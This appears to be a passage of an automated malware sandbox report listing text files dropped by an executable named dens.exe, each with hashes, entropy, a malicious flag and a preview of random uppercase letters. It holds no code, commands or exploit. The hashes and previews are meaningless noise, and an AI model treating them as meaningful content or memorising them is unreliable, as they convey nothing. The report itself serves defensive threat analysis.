                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
